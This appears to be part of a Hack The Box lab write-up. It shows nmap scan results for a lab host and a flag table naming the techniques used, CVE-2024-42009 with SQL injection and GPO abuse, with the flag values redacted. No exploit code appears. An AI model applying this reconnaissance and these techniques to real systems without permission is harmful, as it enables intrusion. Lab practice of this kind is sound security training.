22/tcp open  ssh     syn-ack ttl 127 OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey: 
|   256 33:41:ed:0a:a5:1a:86:d0:cc:2a:a6:2b:8d:8d:b2:ad (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPM91a70VJCxg10WFerhkQv207077raOCX9rTMPBeEbHqGHO954XaFtpqjoofHOQWi2syh7IoOV5+APBOoJ60k0=
|   256 04:ad:7e:ba:11:0e:e0:fb:d0:80:d3:24:c2:3e:2c:c5 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHquJFnMIhX9y8Ea87tDtRWPtxThlpE2Y1WxGzsyvQQM
80/tcp open  http    syn-ack ttl 127 nginx 1.22.1
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.22.1
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022 (87%)
OS CPE: cpe:/o:microsoft:windows_server_2022
OS fingerprint not ideal because: Timing level 5 (Insane) used
Aggressive OS guesses: Microsoft Windows Server 2022 (87%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.95%E=4%D=9/12%OT=22%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=68C4E712%P=x86_64-pc-linux-gnu)
SEQ(SP=105%GCD=1%ISR=107%TS=A)
SEQ(SP=106%GCD=1%ISR=108%TS=A)
OPS(O1=M552NW8ST11%O2=M552NW8ST11%O3=M552NW8NNT11%O4=M552NW8ST11%O5=M552NW8ST11%O6=M552ST11)
WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFDC)
ECN(R=N)
ECN(R=Y%DF=Y%TG=80%W=FFFF%O=M552NW8NNS%CC=Y%Q=)
T1(R=Y%DF=Y%TG=80%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=N)
U1(R=N)
IE(R=Y%DFI=N%TG=80%CD=Z)

Uptime guess: 0.734 days (since Fri Sep 12 06:00:56 2025)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: Busy server or unknown class
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT      ADDRESS
1   74.39 ms 10.10.14.1
2   75.72 ms 10.10.11.54

Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Sep 12 23:37:54 2025 -- 1 IP address (1 host up) scanned in 155.09 seconds

Scripts / Automation

Flag Discovered

Flag #

Host

Flag location

Method used

Value

User

10.10.11.54

Administrator

CVE-2024-42009 + SQLi

<SNIF>

Root

10.10.11.54

Administrator

GPO Abuse

<SNIF>

PreviousHackthebox NextCloud Track

Last updated 1 month ago